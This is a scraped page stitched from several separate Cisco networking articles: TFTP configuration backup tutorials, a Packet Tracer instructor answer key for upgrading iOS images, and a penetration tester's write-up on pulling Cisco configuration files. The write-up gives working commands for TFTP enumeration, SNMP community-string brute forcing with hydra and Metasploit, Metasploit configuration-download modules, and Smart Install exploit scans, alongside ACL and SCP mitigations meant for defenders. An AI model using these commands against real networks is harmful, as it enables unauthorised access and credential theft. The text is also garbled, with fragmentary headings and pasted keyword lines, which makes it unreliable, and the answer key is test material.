Tftp cisco router. 10.7.6 Packet Tracer – Use a TFTP Server to Upgrade a Cisco iOS Image (Answers)

Gadgets

How to backup and restore router configuration via TFTP

Backup hardware’s configuration is the one important routine for network engineers so that when the hardware break down you can recover the failed system within an acceptable time. To backup the configuration, one effective way is to use TFTP to backup and restore configuration between remote hosts.

In the example below, I’ll show how to backup and restore configurations between TFTP Server and Cisco’s router. The TFTP Server will use Cisco TFTP Server software.

Configure TFTP Server

  • Download Cisco TFTP Server from cisco.com or old version at here. Run setup file to install the software on the computer that will be a TFTP Server (the computer that connected to Cisco router on Ethernet port).
  • After installed, you’ll see Cisco TFTP Server shortcut on desktop.
  • Open Cisco TFTP Server. You’ll see the window as below that means you have finished setup TFTP Server. You must leave this window open to send/receive configuration with Router.
  • You can customize TFTP Server root directory (the directory to keep configuration files) by click View. Options on menu bar.

Backup running configuration from a router to the TFTP Server

  • Connect cable from the router to the TFTP Server. Assign IP on both and ensure that you can ping each other. In this example, the TFTP Server has IP address 192.168.11.10 and the router is 192.168.11.1
  • Connect to the router.
  • Type ‘copy running-config tftp:’ (without quote).
  • Enter the IP address of the remote host (the TFTP Server). In this example, it is 192.168.11.10
  • Enter the destination filename to save the configuration to. Or you can enter to accept the value in the bracket[].
  • You’ll see the file that has been created and the status on TFTP Server is updated.
  • The file contain the running configuration of the router.

Restore startup configuration from a file on TFTP Server

  • Connect cable from the router to the TFTP Server. Assign IP on both and ensure that you can ping each other. In this example, the TFTP Server has IP address 192.168.11.10 and the router is 192.168.11.1
  • Connect to the router.
  • Enter the IP address of the remote host (the TFTP Server)
  • Enter the source filename for restore to startup configuration.
  • The destination is startup-config.
  • Now the configuration file has been restored to startup-configuration.

Summary

The example above shows only one common way to backup and restore the configurations but there are other ways like FTP, HTTP, etc so that you can try which way will suit you best.

.7.6 Packet Tracer – Use a TFTP Server to Upgrade a Cisco iOS Image (Instructor Version)

Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

10.7.6 Packet Tracer – Use a TFTP Server to Upgrade a Cisco iOS Image

Objectives

  • Part 1: Upgrade an iOS Image on a Cisco Device
  • Part 2: Backup an iOS Image on a TFTP Server

Scenario

A TFTP server can help manage the storage of iOS images and revisions to iOS images. For any network, it is good practice to keep a backup copy of the Cisco iOS Software image in case the system image in the router becomes corrupted or accidentally erased. A TFTP server can also be used to store new upgrades to the iOS and then deployed throughout the network where it is needed. In this activity, you will upgrade the iOS images on Cisco devices by using a TFTP server. You will also backup an iOS image with the use of a TFTP server.

Part 1: Upgrade an iOS Image on a Cisco Device

Step 1: Upgrade an iOS image on a router.

a. Access the TFTP server and enable the TFTP service.

Go to TFTP Server – tab Services – TFTP – tick On

Active TFTP service on Server – Packet Tracer

Which iOS images stored on the server are compatible with a 1941 router?

c1900-universalk9-mz.SPA.151-4.M4.bin and c1900-universalk9-mz.SPA.155-3.M4a.bin

c. From R2, issue the show flash: command and record the available flash memory.

R2#show flash: System flash directory: File Length Name/status 3 33591768 c1900-universalk9-mz.SPA.151-4.M4.bin 2 28282 sigdef-category.xml 1 227537 sigdef-default.xml [33847587 bytes used, 221896413 available, 255744000 total] 249856K bytes of processor board System flash (Read/Write)

d. Copy the CISCO1941/K9 iOS version 15.5 image for the 1941 router from the TFTP Server to R2.

Note: In an actual network, if there is more than one interface active on the router, you may need to enter the ip tftp source interface command to specify which interface should be used to contact the TFTP server. This command is not supported in PT 7.2 and older versions and is not necessary to complete this activity.

R2# copy tftp: flash: Address or name of remote host []? 192.168.2.254 Source filename []? c1900-universalk9-mz.SPA.155-3.M4a.bin Destination filename [c1900-universalk9-mz.SPA.155-3.M4a.bin]? Accessing tftp://192.168.2.254/c1900-universalk9-mz.SPA.155-3.M4a.bin. Loading c1900-universalk9-mz.SPA.155-3.M4a.bin from 192.168.2.254: [OK. 33591768 bytes] 33591768 bytes copied in 4.099 secs (860453 bytes/sec)

e. Verify that the iOS image has been copied to flash.

How many iOS images are located in flash?

R2#show flash: System flash directory: File Length Name/status 3 33591768 c1900-universalk9-mz.SPA.151-4.M4.bin 5 33591768 c1900-universalk9-mz.SPA.155-3.M4a.bin 2 28282 sigdef-category.xml 1 227537 sigdef-default.xml [67439355 bytes used, 188304645 available, 255744000 total] 249856K bytes of processor board System flash (Read/Write)

f. Use the boot system command to load the version 15.5 IPBase image on the next reload.

R2(config)# boot system flash c1900-universalk9-mz.SPA.155-3.M4a.bin

g. Save the configuration and reload R2.

R2#copy running-config startup-config R2#reload

h. Use the show version command to verify the upgraded iOS image is loaded after R2 reboots.

R2# show version Cisco iOS Software, C1900 Software (C1900-UNIVERSALK9-M), Version 15.5(3)M4a, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2016 by Cisco Systems, Inc. Compiled Thu 06-Oct-16 13:56 by mnguyen ROM: System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1) R2 uptime is 21 seconds System returned to ROM by power-on System image file is flash0:c1900-universalk9-mz.SPA.155-3.M4a.bin.- output omitted.

Step 2: Upgrade an iOS image on a switch.

a. Access the TFTP server and copy the c2960-lanbasek9-mz.150-2.SE4.bin image to S1.

S1#copy tftp: flash: Address or name of remote host []? 192.168.2.254 Source filename []? c2960-lanbasek9-mz.150-2.SE4.bin Destination filename [c2960-lanbasek9-mz.150-2.SE4.bin]? Accessing tftp://192.168.2.254/c2960-lanbasek9-mz.150-2.SE4.bin. Loading c2960-lanbasek9-mz.150-2.SE4.bin from 192.168.2.254:. [OK. 4670455 bytes] 4670455 bytes copied in 3.08 secs (121911 bytes/sec) S1#

b. Use the boot system command to configure the switch to load the new iOS image on boot.

S1(config)#boot system flash0:c2960-lanbasek9-mz.150-2.SE4.bin

c. Reload S1 and verify the new image has been loaded into memory.

S1#copy running-config startup-config S1#reload

d. Close the TFTP configuration window if it is still open.

Part 2: Backup an iOS Image to a TFTP Server

a. On R1, display the contents of flash and record the iOS image.

R1#show flash: System flash directory: File Length Name/status 3 486899872isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin 2 28282 sigdef-category.xml 1 227537 sigdef-default.xml [487155691 bytes used, 2761893909 available, 3249049600 total] 3.17338e06K bytes of processor board System flash (Read/Write)

b. Use the copy command to back up the iOS image in flash memory on R1 to a TFTP server. Note: The isr4300 image is considerably larger than the c1900 image. It will take longer to transmit it to the TFTP server.

R1# copy flash: tftp: Source filename []? isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin Address or name of remote host []? 192.168.2.254 Destination filename [isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin]? Writing isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin output omitted.-. [OK. 486899872 bytes] 486899872 bytes copied in 18.815 secs (83367 bytes/sec)

c. Access the TFTP server and verify that the iOS image has been copied to the TFTP server.Note: You may have to start and stop the TFTP service on the server so the file appears in the file listing.

Cisco Hackery: How Cisco Configuration Files Can Help Attackers Enumerate Your Network

Prior to making a career change to offensive security, I spent over 15 years working for a Cisco partner designing and implementing enterprise and VoIP networks. During that time, I performed best practice assessments aimed at identifying misconfigurations that could lead to a network compromise. Today, I have taken that knowledge and used it to demonstrate how to compromise networks so that I can help clients strengthen their security posture.

tftp, cisco, router, packet, tracer

During the reconnaissance phase of a penetration test, I typically look for an exposed TFTP, SNMP, and Cisco Smart Install (SMI) service on a network. Each one of these services provides an avenue to exploit a misconfiguration to download a Cisco configuration file.

Cisco configuration files can provide a wealth of knowledge for an attacker. Not only do configuration files provide information regarding the device, but they also provide additional avenues for further enumeration and possible lateral movement, such as physical and logical neighbor relations, password reuse, user enumeration, and applied access control lists (ACL).

.0 Configuration File Download

2.1 TFTP

After identifying a TFTP server during the reconnaissance phase, I will rescan the exposed TFTP server port utilizing Nmap with the tftp-enum.nse script. Since TFTP does not provide a directory listing, the NSE script performs basic enumeration of common Cisco configuration file names.

nmap.sU.p69.-script tftp-enum.nse [XXX.XXX.XXX.XXX]

If Nmap successfully enumerates a file name, I will use a TFTP client to attach to the device and issue a get request with the enumerated file name.

2.1.1 TFTP Mitigation

To aid in securing file uploads and downloads to a Cisco device, consider utilizing Secure Copy Protocol (SCP). SCP utilizes Secure Shell (SSH) to securely transfer data over the network. In addition, SCP can be configurated using authentication, authorization, and accounting (AAA) on the Cisco device. This combination can be further configured to specify which users are authorized to copy files.

aaa new-model aaa authentication login default local aaa authorization exec default local IP ssh time-out 120 IP ssh authentication-retries 3 IP scp server enable

However, if business reasons prevent implementing SCP, consider applying an ACL to help secure which IP Address is permitted to connect to the Cisco TFTP server.

no access-list 3 access-list 3 remark TFTP Remote Access access-list 3 permit host [XXX.XXX.XXX.XXX] access-list 3 deny any log tftp-server nvram:startup-config 3

2.2 SNMP

SNMP is another protocol that can be leveraged to upload or download a Cisco configuration file. However, the Read/Write SNMP community string must be known to upload or download the configuration file using SNMPv1 or SNMPv2c. For SNMPv3 configured Cisco devices, user credentials and membership to an SNMP Read/Write Group must be configured to upload or download a configuration file.

2.2.1 SNMP Observations

An interesting observation I made while researching SNMP, is that Nmap returned the results as SNMPv3, even if SNMPv1 or SNMPv2c was configured on a Cisco device. However, if the community string is identified, Nmap properly enumerates the version of SNMP configured on the Cisco device.

From my understanding, Cisco’s SNMP uses the same MIB for each supported version of SNMP. The main difference between version 2 and version 3 are the security features. Unfortunately, I was not able to obtain a definitive answer as to why Nmap fingerprints SNMP for Cisco devices as SNMPv3 when a lesser version of SNMP is configured.

2.2.2 SNMP Brute-Force Guessing

Since SNMPv3 is identified from tools like Nmap and Nessus, I use two different methods of brute-forcing. The first method is using the community string for SNMPv1/2c, and the second method is user enumeration and password guessing for SNMPv3.

2.2.2.1 SNMPv1 and SNMPv2c

For brute-force guessing an SNMPv1 and SNMPv2c community string, there are multiple tools to get the job done. The following are just a few that I might use during an engagement.

nmap.Pn.sUV.p 161 [XXX.XXX.XXX.XXX].-script snmp-brute
hydra.P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt [XXX.XXX.XXX.XXX] snmp

Example Metasploit Configuration and Execution:

use auxiliary/scanner/snmp/snmp_login set RHOSTS [XXX.XXX.XXX.XXX] run

2.2.2.2 SNMPv3

For SNMPv3 brute forcing, I use snmpwn in two stages. The first stage is user enumeration, when I leverage similar techniques that I use to enumerate users from Active Directory or a web login portal. However, snmpwn does require a password list or an encrypted password list while performing enumeration, which technically is a password guessing attack. So, I use a single password within both lists to help eliminate possible user account lockout.

Once I have successfully enumerated a username, I then move to password guessing. This time, I use a single common password (e.g. MonthYear) for both the password and encrypted password to avoid a user account lockout.

2.2.3 SNMP File Download

Just like brute-forcing was different for the Cisco versions of SNMP, so is SNMP file download. For SNMPv1 and SNMPv2c, I like to leverage the Metasploit cisco_config_tftp module. For SNMPv3, I was not able to find a public application that would download a Cisco configuration file, so I created config-dump to help automate the process.

2.2.3.1 SNMPv1 and SNMPv2c

The Metasploit cisco_config_tftp module includes automation for starting/stopping the TFTP server. The following is an example of configuring and executing the module:

use auxiliary/scanner/snmp/cisco_config_tftp set RHOSTS [XXX.XXX.XXX.XXX] set Community [private] set OUTPUTDIR [/tmp] run

2.2.3.2 SNMPv3

Utilizing config-dump requires a separate TFTP server, so I usually use a Python3 TFTP server. At a minimum, config-dump requires the target, tftp server, authentication protocol, authentication protocol password, username, and password. Pending the SNMPv3 device configuration, snmpwn might require the protocol and protocol password that will need to be included when executing config-dump.

Example config-dump execution:

python3 config-dump.py.t [XXX.XXX.XXX.XXX].a SHA.A [Password].x AES.X [Password].u [username].s [XXX.XXX.XXX.XXX] List of config-dump flags:.t: SNMPv3 Target.a: Authentication Protocol (MD5 or SHA).A: Authentication Protocol Password.x: Protocol (DES or AES).X: Protocol Password.u: Username.s: TFTP Server

2.2.4 Mitigation

The best method to secure SNMPv1 and SNMPv2c on a Cisco device is to implement SNMPv3 with an ACL. If business reasons prevent implementing SNMPv3, consider applying an ACL to help secure the IP Address that is permitted to connect to the configured SNMP server.

2.2.4.1 SNMPv1 and SNMPv2 ACL

no access-list 1 access-list 1 remark [SNMP Remote Access] access-list 1 permit host [XXX.XXX.XXX.XXX] access-list 1 deny any log Example ACL Applied to the SNMP Server Community: snmp-server community [private] RW 1 snmp-server community [public] RO 1

2.2.4.2 SNMPv3 ACL

When applying the ACL to SNMPv3, be sure that the ACL is applied to both the SNMP Server group and user. During my testing, I was able to download the Cisco device configuration file when the ACL was only applied to SNMP Server user or group.

no access-list 1 access-list 1 remark [SNMP Remote Access] access-list 1 permit host [XXX.XXX.XXX.XXX] access-list 1 deny any log Example ACL Applied to both the SNMPv3 Server Group and User: snmp-server group snmp-ro v3 priv read [SNMPv3View] access 1 snmp-server group snmp-rw v3 priv write [SNMPv3View] access 1 snmp-server user [secret] snmp-rw v3 auth md5 [Password] priv 3des [Password] access 1

2.2.5 SNMPv1 and SNMPv2c Bypass

With SNMPv1 and SNMPv2 securely configured by utilizing a complex community string and an applied ACL, it is possible to bypass security measures to download a Cisco configuration file. Cisco-SNMP-Slap can be leveraged to spoof an IP Address in an ACL which is permitted to download the Cisco configuration file.

Cisco-SNMP-Slap does require knowledge of the network and the targeted Cisco device. For instance, knowing the community string as well as the permitted IP Address range within the ACL is key for a successful spoofing attack. In addition, a TFTP server is required for downloading the configuration file.

2.3 SMI

Cisco SMI is a Plug-N-Play feature that provides Zero-Touch deployment for Cisco switches and communicates on TCP Port 4786. When this feature was first introduced it could not be disabled, which made it vulnerable to Remote Code Execution (RCE). However, Cisco later downgraded the security advisory status to Informational and explained that it was protocol misuse on May 23, 2018.

Nessus modified their vulnerability rating of this finding to information and documented that there was not a risk factor. However, the Cisco device that Nessus scanned was, in fact, vulnerable to the RCE, which was exploited during a penetration test that I performed in the summer of 2022.

2.3.1 SMI Vulnerability Discovery

Once initial reconnaissance identified that TCP Port 4786 was open, I will rescan the port with Nmap and leverage the cisco-siet.nse script to identify if the vulnerable RCE is present on the Cisco device.

nmap [XXX.XXX.XXX.XXX].p 4786.-script cisco-siet.nse

2.3.2 SMI Vulnerability Exploitation

For vulnerability exploitation, I use one of two scripts pending the engagement type. If I am performing a penetration test and just want to download the configuration file, I use Cisco SmartInstall Exploit. If I have client permission to modify the device, I will leverage SIET to gain a foothold and then laterally move across the network.

For OPSEC considerations, keep in mind that a device with an iOS version prior to 15.2(2)E will require a reboot if utilizing SIET to modify the Cisco iOS configuration file.

2.3.3 SMI Mitigation

The easiest way to mitigate Cisco SMI is by turning it off if it is not in use.

However, if there is a business reason that SMI cannot be disabled, create and apply an inbound ACL to limit the IP Address permitted to access this service.

Create an Access Control List (ACL):

ip access-list extended SMI_HARDENING_LIST permit tcp host [XXX.XXX.XXX.XXX] host [XXX.XXX.XXX.XXX] eq 4786 deny tcp any any eq 4786 permit IP any any Apply Inbound ACL to all Interfaces: ip access-group SMI_HARDENING_LIST in

.0 Configuration File

After downloading the configuration file from the Cisco device, I review the contents to determine if I can connect to the device to establish a foothold. In addition, I review the SNMP configuration to determine if I can leverage it download additional Cisco device configuration files. Lastly, I review the configuration for any details to aid in further enumerating the network.

3.1 Establish a Foothold

When attempting to establish a foothold, I check the VTY Port configuration to determine connectivity type as well as an applied ACL. In Figure 16, the VTY ports accept a local login via Telnet or SSH and there is not an applied ACL.

Next, I review the configured usernames and the configured hashed passwords for possible password recovery. I also make a note for those usernames that do not appear to be shared, like admin and enable, for possible user enumeration against other platforms, such as Active Directory. For those shared usernames, these typically have the same password configured on multiple Cisco devices.

After recovering a password, I use the configured IP Address to connect to the Cisco device and establish a foothold.

3.2 Configuration Download

Whether I am successful in establishing a foothold or not, I always review the SNMP configuration for additional attack paths. Reviewing Figure 18, there are both the SNMP Read and Read/Write community strings in plaintext. These can be leveraged to perform SNMP brute-force guessing against other exposed SNMP services. In addition, there is a configured SNMP ACL, but it was not applied to either community string. Within the ACL, there is an IP Address that is permitted to access the SNMP server. If the SNMP ACL was applied to other Cisco devices, Cisco-SNMP-Slap could be leveraged with the IP Address to bypass an applied SNMP ACL and download the configuration file.

3.3 Network Enumeration

I review static and dynamic routes as well as configured VLANs and port descriptions to better understand the network environment. In Figure 19, there is a single default static route and no dynamic routing. Vlan254 appears to be the only routed subnet configured on the device. For the other configured VLANs, it would appear that they could be isolated networks, but more enumeration would be required for confirmation.

Taking a closer look at the port descriptions in Figure 20, the Cisco device appears to have a Wireless Access Point configured on the first ethernet interface. In addition, the port description for both ethernet ports 0/2 and 0/3 suggest a VoIP phone system is configured on the network.

.0 Conclusion

As I briefly demonstrated, obtaining a Cisco configuration file could provide an attacker the required information to establish a foothold and laterally move across a network. I am hopeful that the information shared makes both network administrators and security professionals aware of these misconfigures and provides a reference to further improve securing Cisco networks.

How To Backup and Restore Cisco Switch/Router Configuration Files Using TFTP Server

Backing up and restoring Cisco router/switch configuration files using TFTP is one of the topics of the CCNA certification exam. In this guide, you will learn how to back up and recover Cisco switch/router configurations using a TFTP server. These procedures are easy and require a few straightforward steps. But first, let’s take a look at how TFTP works.

What is TFTP and How Does it Work?

TFTP stands for Trivial File Transfer Protocol. It is a pretty simple file transfer protocol that is used to share files through a network.

TFTP uses UDP as its Layer 4 protocol and port 69 to initiate file transfer requests. Unlike FTP, TFTP does not support authentication.

TFTP client and server exchange files using ephemeral port numbers, ranging from 1024 to 65535. Both the client and server independently choose the UDP port to transfer data during the negotiation of the transfer request.

TFTP uses five packet types:

  • Read request (RRQ)
  • Write request (WRQ)
  • Data (DATA)
  • Acknowledgment (ACK)
  • Error (ERROR)

Here are the steps a TFTP connection goes through when downloading a file from a TFTP server to a TFTP client:

Step 1. The client initiates a read request by sending an RRQ packet to the server at port number 69. The request includes a filename and a transfer mode.

Curriculo 3 Resolucion 9.1.2.5 Uso de un servidor TFTP para actualizar una imagen del IOS de Cisco

Step 2. The server acknowledges the RRQ packet using a DATA packet that is sent from a random UDP port number in the range 1024 to 65535. The client uses that port number to send upcoming TFTP DATA packets to the server.

Step 3. The server starts sending numbered DATA packets to the destination host. Each data packet, except the last one, has a unique sequence number and includes a full-sized block of data.

Step 4. The client confirms the reception of each DATA packet using numbered ACK packet. The server confirms the reception of the ACK of the first sent data block with the DATA packet of the next block.

Step 5. If an ACK is not eventually received from the client, the server runs a retransmit timer to send the corresponding DATA packet.

Step 6. The server signals the end of the file transfer to the client by sending a DATA packet with a size equal to 0 or smaller than the full size. If the size of the file being sent is not multiple of a full-sized block, the DATA packet’s size would not be equal to 0; otherwise, it would.

When uploading a file to a TFTP server, the client and the server go through similar steps, except that the client uses a WRQ packet to initiate the file transfer session.

In the rest of this tutorial, I will be using the following network diagram. The network consists of three devices: a Cisco router, a Cisco Switch, and a TFTP server. You can get and install a free TFTP server app from this link.

How To Backup Cisco Router/Switch Configuration Files Using a TFTP Server

Backing up a Cisco router/switch configuration file is a straightforward procedure; here are the steps to follow:

Step 1. Configure a TFTP server. There are several free TFTP software online like Tftpd64 and 3Com Daemon.

Step 2. Connect the Cisco router/switch to the computer hosting the TFTP server app.

Step 3. Configure IP addresses on both the router/switch and the TFTP server.

Switch enable Switch# conf t Switch(config)# hostname SW1 SW1(config)# interface vlan 1 SW1(config-if)# ip address 172.16.0.2 255.255.255.0 SW1(config-if)# no shutdown

Step 4. Ping the TFTP server from the router/switch to ensure both devices can connect.

SW1# ping 172.16.0.10 Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 172.16.0.10, timeout is 2 seconds: Success rate is 100 percent (5/5), round-trip min/avg/max = 0/0/0 ms

Step 5. Access the Cisco router/switch’s CLI via a console cable, Telnet, or SSH.

Step 6. In enable mode, issue the copy startup-config tftp: command or the copy running-config tftp: command to backup the startup configuration file or the running configuration file, respectively. Both commands would prompt you for a name under which to store the configuration file on the TFTP server, and the IP address of the TFTP server.

In this example, we save SW1’s running configuration file using the name “SW1-running-config.cfg” to the TFTP server with IP address 172.16.0.10.

SW1# copy running-config tftp: Address or name of remote host []? 172.16.0.10 Destination filename [SW1-confg]? SW1-running-config.cfg Writing running-config. [OK. 1089 bytes] 1089 bytes copied in 0 secs

Step 8. Open the folder where the TFTP server stores files to check that a copy of the configuration file is there. If you are using Packet Tracer, click the icon of the TFTP server, open the services tab, and then click TFTP in the Services section. You will get a screen like this.

How To Restore Cisco Router/Switch Configuration Files from a TFTP Server

Restoring a configuration file from a TFTP is similar to backing up a file from a TFTP server. Here are the steps to restore a Cisco router/switch configuration file (startup/running configuration):

Step 1. Set up a TFTP server.

Step 2. Connect the Cisco router/switch directly or through another network device to the TFTP server.

Step 3. Configure IP addresses on both the router/switch and the TFTP server.

Router enable Router# conf t Router(config)# hostname R1 R1(config)# interface gigabitEthernet 0/0 R1(config-if)# ip address 172.16.0.1 255.255.255.0 R1(config-if)# no shutdown

Step 4. Ping the TFTP server from the router/switch to make sure both devices can connect.

R1# ping 172.16.0.10 Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 172.16.0.10, timeout is 2 seconds: Success rate is 100 percent (5/5), round-trip min/avg/max = 0/0/0 ms

Step 5. Connect to the Cisco router/switch’s CLI via a console cable, Telnet, or SSH.

Step 6. In privileged EXEC mode, issue the copy tftp: startup-config command or the copy tftp: running-config command to recover the startup configuration file or the running configuration file, respectively. Both commands would ask you to supply the name of the source file that will be used to replace the content of the chosen configuration file, confirm the name of the configuration file to restore, and enter the IP address of the TFTP server.

R1# copy tftp: startup-config Address or name of remote host []? 172.16.0.10 Source filename []? R1-running-config.txt Destination filename [startup-config]? ! press Enter key Accessing tftp://172.16.0.10/R1-running-config.txt. Loading R1-running-config.txt from 172.16.0.10: ! [OK. 18057 bytes] 18057 bytes copied in 1 secs

Step 8. Using the more command, display the current content of the recovered file. Also, review all lines that are starting with “AAA” to make sure that authentication is properly configured so that you don’t risk being locked out of the router/switch.

Backup and Restore Cisco Switch/Router Configuration Files Using a TFTP Server in Packet Tracer

Here is a Packet tracer lab file that you can download in order to practice the Cisco iOS commands used to backup and restore Cisco switch/router configurations using a TFTP server.

Troubleshooting Backing up and Restoring Cisco Router/Switch Configurations Using a TFTP Server

The backup process may fail because of one of these reasons:

  • The TFTP service is down
  • The TFTP server is unreachable because of bad IP addressing on the client or the server, or due to routing issues in the network.
  • Incorrect or inexistent source/destination file name.
  • An ACL is blocking TFTP traffic between the client and the server.
tftp, cisco, router, packet, tracer

Conclusion

I hope this blog post helps you learn something.Now I’d like to turn it over to you:What did you like about this tutorial?Or maybe you have an excellent idea that you think I need to add.Either way, let me know by leaving a comment below right now.

How to upgrade Cisco iOS Image

Cisco iOS devices typically use their flash memory to store the iOS image. On most routers, this flash memory can be easily replaced. On some switches, it is integrated in the device and can’t be replaced.

In this lesson, I’ll show you some different options how to copy a new iOS image to your Cisco iOS router or switch. I will use a Cisco 2800 iOS router in these examples.

First, head over to Cisco.com Support Download and grab the iOS image that you want. For example:

If you hover your mouse over the filename, you will see some extra information:

Above you can see the file name and MD5 checksum. The checksum can be used to check if the file that you downloaded is the same or has changed. I’ll show you this later.

Once you downloaded the iOS image, check if you have enough space left on your flash memory:

R1#show flash:.#-.-length.date/time path 1 1119 Sep 29 2015 11:11:52 00:00 r1-r2-r3.cfg 2 1184 Dec 3 2014 15:14:06 00:00 R1-R2-ASA1-ASA2.cfg 3 1125 Dec 23 2014 13:41:32 00:00 ASA1-R1-R2-R3.cfg 5 76 Jul 17 2014 12:09:10 00:00 System Volume Information/IndexerVolumeGuid 6 1060 Aug 11 2015 12:53:50 00:00 mpls-pe-ce-basic-addressing.cfg 7 1213 Sep 30 2015 15:05:02 00:00 router-on-a-stick.cfg 8 67926080 Apr 2 2015 14:21:46 00:00 c2800nm-adventerprisek9-mz.151-4.M10.bin 3862364160 bytes available (137428992 bytes used)

On my flash memory, there are a bunch of configuration files and the current iOS image. There are 3862364160 bytes available (3862 MB) so we have plenty of space.

When we want to copy something to or from this router, we have to use the copy command:

R1#copy ? /erase Erase destination file system. /error Allow to copy error file. /noverify Don’t verify image signature before reload. /verify Verify image signature before reload. archive: Copy from archive: file system cns: Copy from cns: file system flash: Copy from flash: file system ftp: Copy from ftp: file system http: Copy from http: file system https: Copy from https: file system null: Copy from null: file system nvram: Copy from nvram: file system pram: Copy from pram: file system rcp: Copy from rcp: file system running-config Copy from current system configuration scp: Copy from scp: file system startup-config Copy from startup configuration system: Copy from system: file system tar: Copy from tar: file system tftp: Copy from tftp: file system tmpsys: Copy from tmpsys: file system xmodem: Copy from xmodem: file system ymodem: Copy from ymodem: file system

We have a lot of options. The most common options for copying an iOS image are:

I will explain all three options to you.

Newer routers also support copying from USB sticks. This will show up as usbflash: in the filesystem overview.

TFTP

TFTP (Trivial File Transfer Protocol) is similar to FTP but much simpler, like a light weight version. It doesn’t support authentication or encryption and uses UDP for transmission. I will use the following topology:

We need a TFTP server application, a great choice here is TFTPD32. You can download it for free and it’s an executable, no need to install anything.

Once you downloaded TFTPD32, start it:

And you will see the main screen:

Make sure you select the correct directory where you downloaded your iOS image and if you have multiple network interfaces, select the correct interface.

The copy command works in both directions. I can copy to and from the TFTP server. Here’s how to copy the current iOS image to the TFTP server:

R1#copy flash: tftp: Source filename []? c2800nm-adventerprisek9-mz.151-4.M10.bin Address or name of remote host []? 192.168.1.200 Destination filename [c2800nm-adventerprisek9-mz.151-4.M10.bin]? 67926080 bytes copied in 312.508 secs (217358 bytes/sec)

When you use the copy flash: tftp: command, it will ask you for the IP address and filename. When you see something between [] (brackets), you can just hit the enter button. For example, since I specified the source name, the router assumes I want to use the same file name for the destination. Don’t type “y” or “yes” here or that will become the destination filename.

tftp, cisco, router, packet, tracer

We can see the transfer on our router or you can see it in TFTPD32:

We now have a backup of our current iOS image. Let’s copy the new image to the router:

R1#copy tftp: flash: Address or name of remote host []? 192.168.1.200 Source filename []? c2800nm-adventerprisek9-mz.151-4.M12a.bin Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]? Accessing tftp://192.168.1.200/c2800nm-adventerprisek9-mz.151-4.M12a.bin. Loading c2800nm-adventerprisek9-mz.151-4.M12a.bin from 192.168.1.200 (via FastEthernet0/0):. [OK. 67929600 bytes] 67929600 bytes copied in 316.628 secs (214541 bytes/sec)

The transfer has completed, let’s take a look at our flash memory:

R1#show flash: | include.bin 8 67926080 Apr 2 2015 14:21:46 00:00 c2800nm-adventerprisek9-mz.151-4.M10.bin 25 67929600 Nov 4 2016 12:11:22 00:00 c2800nm-adventerprisek9-mz.151-4.M12a.bin

Above we can see the new iOS image.

The copy command also allows you to enter parameters like the IP address of the TFTP server and filenames. Here is an example:

R1#copy tftp://192.168.1.200/c2800nm-adventerprisek9-mz.151-4.M12a.bin flash: Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]?

Above you can see that I already entered the IP address and filename. Once I hit enter, it will only ask me for the destination filename (which I also could have entered). If you have to upgrade the iOS image on multiple devices, this is more convenient as you can just copy/paste the above line on all devices.

You can also turn a Cisco iOS router or switch into a TFTP server. You only need one command to accomplish this:

R1(config)#tftp-server flash:c2800nm-advipservicesk9-mz.124-24.T8.bin alias 2800-image.bin

The alias parameters lets you use a different name for the filename. In the example above, “2800-image.bin” refers to the actual file on the flash of my router.

FTP

Copying to or from an FTP server is also no problem, we can do this with the same copy command. One thing you might have to deal with is authentication. Most FTP servers will require a username and password. Here is the topology I will use:

There are two things we can do to supply a username and password. Here is option one::

R1(config)#ip ftp username admin R1(config)#ip ftp password cisco

We can globally configure the username and password that we want to use for the FTP server. When you use the copy command, Cisco iOS will use these values for authentication.

10.6.12 Lab. Use TFTP, Flash, and USB to Manage Configuration Files

Personally, I don’t like leaving this information in the running configuration. It’s also possible to supply a username and password with the copy command. Here is an example:

R1#copy ftp://admin:cisco@192.168.1.201/c2800nm-adventerprisek9-mz.151-4.M12a.bin flash: Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]? Accessing ftp://:@192.168.1.201/c2800nm-adventerprisek9-mz.151-4.M12a.bin. Loading c2800nm-adventerprisek9-mz.151-4.M12a.bin from 192.168.1.201 (via FastEthernet0/0):. [OK. 67929600 bytes] 67929600 bytes copied in 884.704 secs (76782 bytes/sec)

Above you can see I embedded the username “admin”, the password “cisco” and the IP address of my FTP server. This way is also easier, you can copy/paste this line on all devices that require an iOS image upgrade.

SCP

Last but not least, we have SCP (Secure Copy) which uses SSH. This is a great method because of two reasons:

  • It allows you to use your router/switch as an SCP server.
  • It uses encryption.
  • You probably already have SSH configured on your router or switch.

I will show you how to configure your router as an SCP server and how to copy files to/from it. I’m going to use two routers for this:

R1 Configuration

First, we have to configure SSH:

R1(config)#ip domain-name NETWORKLESSONS.LOCAL R1(config)#line vty 0 4 R1(config-line)#transport input ssh R1(config-line)#login local R1(config)#crypto key generate rsa The name for the keys will be: R1.NETWORKLESSONS.LOCAL Choose the size of the key modulus in the range of 360 to 4096 for your General Purpose Keys. Choosing a key modulus greater than 512 may take a few minutes. How many bits in the modulus [512]: 1024 % Generating 1024 bit RSA keys, keys will be non-exportable. [OK] (elapsed time was 3 seconds) R1(config)#ip ssh version 2

Now we only need two additional commands for SCP. The first one is to enable the SCP server:

R1(config)#ip scp server enable

And we need a user that has full access to the router:

R1(config)#username admin privilege 15 password cisco

Let’s continue with R2, our SCP client.

R2 Configuration

R2 will be our SCP client. Let’s try the copy command:

R2#copy scp: flash: Address or name of remote host []? 192.168.1.1 Source username []? admin Source filename []? c2800nm-adventerprisek9-mz.151-4.M12a.bin Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]? Password:. 67929600 bytes copied in 884.704 secs (76782 bytes/sec)

The copy command will ask for the remote IP address, username, password, and filename.

MD5 Verification

So far we copied a couple of files but how do we know that these files are valid? When we downloaded the Cisco iOS image, I showed you the MD5 checksum that Cisco publishes on their website. We can verify this checksum on our router:

